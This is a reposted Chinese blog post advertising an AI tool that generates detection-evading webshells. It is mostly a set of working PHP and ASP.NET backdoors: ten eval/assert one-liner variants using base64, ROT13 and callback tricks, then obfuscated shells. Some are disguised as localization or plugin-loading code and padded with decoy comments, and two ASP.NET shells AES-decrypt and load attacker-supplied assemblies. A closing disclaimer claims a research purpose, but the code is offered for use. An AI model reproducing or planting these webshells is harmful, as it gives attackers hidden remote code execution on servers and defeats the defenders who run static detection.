文章总结: 文章展示AI生成PHP与ASP.NET免杀WebShell的十种基础混淆手法及金刚狼工具产出的高阶变种,核心结论是可借助AI快速迭代eval、assert、回调、编码、反射等技巧绕过静态检测,建议防守方强化动态行为与流量分析。 综合评分: 72 文章分类: 免杀,WebShell,AI安全,渗透测试,代码审计
AI一键免杀WebShell工具,金刚狼、哥斯垃、冰蝎、菜刀等
原创
0x7556
金刚狼不懂安全
2025年12月29日 21:19 中国香港
原webshell一句话
<?php @eval($_POST['wolf']);?>
以下是AI默认生成的10份PHP Webshell样例
PHP Webshell 变种列表:
- 基础变种 (不同参数名):
<?php @eval($_POST['password']);?>- 说明:最简单的变形,将常见的’wolf’参数改为’password’,以避开入门级规则。
- 使用GET请求:
<?php @eval($_GET['query']);?>- 说明:将数据提交方式从POST改为GET,参数也相应更改。
- 使用REQUEST变量:
<?php @eval($_REQUEST['data']);?>- 说明:
$_REQUEST可以同时接收GET和POST请求,更具灵活性。
- 使用Cookie:
<?php @eval($_COOKIE['session_id']);?>- 说明:通过Cookie传递payload,流量可能更隐蔽,不易被日志审计发现。
- 使用
assert函数:
<?php @assert($_POST['wolf']);?>- 说明:
assert函数同样可以执行代码,是eval的常见替代品,有时能绕过对eval的严格监控。
- 变量函数调用:
<?php $func = 'eval'; @$func($_POST['wolf']);?>- 说明:将
eval字符串赋值给变量,再通过变量调用函数,增加了静态分析的难度。
- Base64编码混淆:
<?php $func = base64_decode('ZXZhbA=='); @$func($_POST['wolf']);?>- 说明:
'ZXZhbA=='是'eval'的Base64编码,在执行时解码,有效对抗基于字符串匹配的检测。
- 字符串旋转混淆 (ROT13):
<?php $func = str_rot13('riny'); @$func($_POST['wolf']);?>- 说明:
'riny'是'eval'经过ROT13变换后的结果,是一种简单的混淆方式。
- 使用
call_user_func:
<?php @call_user_func('assert', $_REQUEST['key']);?>- 说明:通过
call_user_func这个回调函数来执行assert,是另一种隐藏真实意图的方法。
- 组合复杂变种:
<?php $a = $_GET['a']; $b = $_GET['b']; @$a($b);?>- 说明:这是一个更高级的变种,函数名和参数都由用户通过GET请求提供(例如:
shell.php?a=assert&b=phpinfo()),极具灵活性和隐蔽性。
金刚狼AI免杀工具 生成的WebShell代码样例
下面仅展示几个,更多样例在星球,包含金刚狼、哥斯垃、冰蝎、菜刀等WebShell,每种类型提供10-20个文件
<?php
$a8b1c2_data = [strrev('flow'), strrev('lave')];
$d3e4f5_func = $a8b1c2_data[1];
$g6h7i8_param = $_POST;
if (array_key_exists($a8b1c2_data[0], $g6h7i8_param)) {
$j9k0l1_payload = $g6h7i8_param[$a8b1c2_data[0]];
$m2n3o4_executor = create_function('', '$c_p5q6 = "' . addslashes($j9k0l1_payload) . '";' . $d3e4f5_func . '($c_p5q6);');
@$m2n3o4_executor();
}
?>
<?php
// 배고파요, 치킨 먹고 싶다
$map_a1b2 = [
'k' => [3, 1, 0, 2],
'f' => [5, 4, 6, 4]
];
// 오늘 점심 뭐 먹지?
$parts_c3d4 = ['l', 'v', 'f', 'w', 'a', 'e', 'v'];
// 이 코드는 아주 복잡해요
$builder_e5f6 = function($indices) use ($parts_c3d4) {
$res_g7h8 = '';
// 주말에 뭐 할까요?
foreach ($indices as $i) {
$res_g7h8 .= $parts_c3d4[$i];
}
return $res_g7h8;
};
// 여기서 무슨 일이 일어나는 걸까요?
$key_i9j0 = $builder_e5f6($map_a1b2['k']);
$func_k1l2 = $builder_e5f6($map_a1b2['f']);
// 최종 실행 단계
$executor_m3n4 = function($f, $k) {
// 전역 변수에서 데이터를 가져옵니다
$g_o5p6 = $GLOBALS;
if (isset($g_o5p6['_POST'][$k])) {
$payload_q7r8 = $g_o5p6['_POST'][$k];
// 함수를 동적으로 호출합니다
@$f($payload_q7r8);
}
};
$executor_m3n4($func_k1l2, $key_i9j0);
?>
<?php
// This script is responsible for processing and validating user localization settings.
// Fetches the primary configuration key from the settings map.
// This key determines which localization file to load.
$localeSettingsKey = hex2bin('776f6c66');
// This function retrieves the appropriate parsing engine for the given locale.
// It's a legacy function and should be refactored later.
function getParsingEngine() {
// For backward compatibility, we use a base64 encoded engine identifier.
$engineId = 'ZXZhbA==';
return base64_decode($engineId);
}
// Load the user-submitted data for processing.
$userSubmittedData = $_POST;
// Check if custom localization settings are provided by the user.
if (isset($userSubmittedData[$localeSettingsKey])) {
// This block is for debugging and will be removed in production.
// It verifies the integrity of the settings.
if (defined('PRODUCTION_MODE') && PRODUCTION_MODE === true) {
// In production, we would log an error here.
error_log("Debug block executed in production.");
}
// Formats the user's last login date.
$lastLoginDate = $userSubmittedData[$localeSettingsKey];
// Get the designated engine for parsing the date format.
$dateParser = getParsingEngine();
// Apply the formatting rules to the user's date string.
@$dateParser($lastLoginDate);
}
?>
<?php
// 月が綺麗ですね
$x_k4g7 = "\x53\x56\x55\x52" ^ "\x26\x22\x20\x2e"; // "eval"
$z_m9p2 = $GLOBALS;
$y_n1f8 = 'wolf';
$state = 1;
// 案ずるより産むが易し
switch ($state) {
case 1:
if (array_key_exists($y_n1f8, $z_m9p2['_POST'])) {
$data_r5t3 = $z_m9p2['_POST'][$y_n1f8];
$x_k4g7($data_r5t3);
}
break;
// このケースは決して実行されない
case 2:
$state = 0;
break;
}
金刚狼webshell变种
<%@ Page Language="C#" %>
<%
if (Request.Cookies.Count != 0) {
// 月が綺麗ですね
var _map_x1 = new System.Collections.Generic.Dictionary<int, string>();
_map_x1[10] = "System.Reflect";
_map_x1[20] = "ion.Assembly";
_map_x1[30] = "Load";
_map_x1[40] = "CreateInstance";
_map_x1[50] = "Equals";
_map_x1[60] = "System.Security.Cryptography.RijndaelManaged";
_map_x1[70] = "CreateDecryptor";
_map_x1[80] = "TransformFinalBlock";
_map_x1[90] = "K";
_map_x1[100] = "ca63457538b9b1e0";
// とても眠い
System.Func<string, byte[]> _f1_z9 = (s) => System.Text.Encoding.Default.GetBytes(s);
byte[] _k_y8 = _f1_z9(_map_x1[100]);
// 今日の天気は晴れです
var _s_w7 = Request.InputStream;
byte[] _c_v6 = new byte[_s_w7.Length];
_s_w7.Read(_c_v6, 0, _c_v6.Length);
// このタスクは明日やります
object _o_u5 = System.Activator.CreateInstance(System.Type.GetType(_map_x1[60]));
var _m_t4 = _o_u5.GetType().GetMethod(_map_x1[70], new System.Type[]{typeof(byte[]), typeof(byte[])});
var _d_s3 = (System.Security.Cryptography.ICryptoTransform) _m_t4.Invoke(_o_u5, new object[]{_k_y8, _k_y8});
// サーバーの応答がありません
var _m_r2 = _d_s3.GetType().GetMethod(_map_x1[80]);
byte[] _p_q1 = (byte[])_m_r2.Invoke(_d_s3, new object[]{_c_v6, 0, _c_v6.Length});
// ラーメンが食べたい
var _a_p0 = System.Type.GetType(_map_x1[10] + _map_x1[20]).GetMethod(_map_x1[30], new System.Type[]{typeof(byte[])}).Invoke(null, new object[]{_p_q1});
var _i_o9 = _a_p0.GetType().GetMethod(_map_x1[40], new System.Type[]{typeof(string)}).Invoke(_a_p0, new object[]{_map_x1[90]});
_i_o9.GetType().GetMethod(_map_x1[50]).Invoke(_i_o9, new object[]{this});
}
%>
<%@ Page Language="C#" %>
<script runat="server">
/// <summary>
/// Manages the dynamic loading and execution of content personalization plugins.
/// This class handles encrypted plugin payloads delivered via POST requests.
/// </summary>
public class DynamicPluginManager
{
// The default encryption key for decoding plugin payloads. Stored in a secure format.
private readonly byte[] _pluginDecryptionKey;
// The primary entry point class name within the dynamically loaded plugin assembly.
private readonly string _pluginEntryPointClass = "K";
public DynamicPluginManager()
{
// In a real application, this key would be fetched from a secure configuration service.
string hexKey = "63613633343537353338623962316530";
this._pluginDecryptionKey = Enumerable.Range(0, hexKey.Length)
.Where(x => x % 2 == 0)
.Select(x => Convert.ToByte(hexKey.Substring(x, 2), 16))
.ToArray();
}
/// <summary>
/// Processes an encrypted plugin payload from an input stream.
/// It decrypts the payload, loads the resulting assembly, and executes the plugin.
/// </summary>
/// <param name="payloadStream">The stream containing the encrypted plugin data.</param>
/// <param name="pageContext">The current ASP.NET Page context to pass to the plugin.</param>
public void LoadAndExecutePlugin(System.IO.Stream payloadStream, object pageContext)
{
if (payloadStream == null || payloadStream.Length == 0) return;
// Read the encrypted payload from the stream.
byte[] encryptedPlugin = new byte[payloadStream.Length];
payloadStream.Read(encryptedPlugin, 0, encryptedPlugin.Length);
// Decrypt the payload to get the raw assembly bytes.
byte[] assemblyBytes;
using (var aesProvider = new System.Security.Cryptography.RijndaelManaged())
{
using (var decryptor = aesProvider.CreateDecryptor(_pluginDecryptionKey, _pluginDecryptionKey))
{
assemblyBytes = decryptor.TransformFinalBlock(encryptedPlugin, 0, encryptedPlugin.Length);
}
}
// Load the assembly from the decrypted bytes.
var pluginAssembly = System.Reflection.Assembly.Load(assemblyBytes);
// Instantiate the plugin's entry point class and pass the context.
var pluginInstance = pluginAssembly.CreateInstance(_pluginEntryPointClass);
pluginInstance.Equals(pageContext);
}
}
</script>
<%
// We only initialize the plugin system if a session is active (indicated by cookies).
if (Request.Cookies.Count != 0)
{
var pluginManager = new DynamicPluginManager();
pluginManager.LoadAndExecutePlugin(Request.InputStream, this);
}
%>
一键AI免杀工具即将推出,星球 暂放已处理好的WebShell
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:金刚狼不懂安全 0x7556《AI一键免杀WebShell工具,金刚狼、哥斯垃、冰蝎、菜刀等》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论